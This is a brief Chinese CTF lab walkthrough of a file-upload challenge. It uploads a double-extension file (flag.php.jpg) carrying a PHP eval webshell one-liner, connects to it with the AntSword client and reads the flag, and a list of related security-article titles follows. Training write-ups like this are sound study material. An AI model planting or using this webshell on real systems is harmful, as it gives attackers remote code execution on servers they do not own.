题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
网安INF4 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)lubiii_4 小时前
墨者学院-密码学实训隐写术第二题李枫月7 小时前
Server2003 B-1 Windows操作系统渗透饮长安千年月10 小时前
JavaSec-SpringBoot框架Bruce_Liuxiaowei14 小时前
PHP文件包含漏洞详解:原理、利用与防御2501_9151063215 小时前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析网安INF15 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)Bruce_Liuxiaowei17 小时前
深入理解PHP安全漏洞:文件包含与SSRF攻击全解析痴人说梦梦中人1 天前
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器Web极客码1 天前
如何轻松、安全地管理密码(新手指南)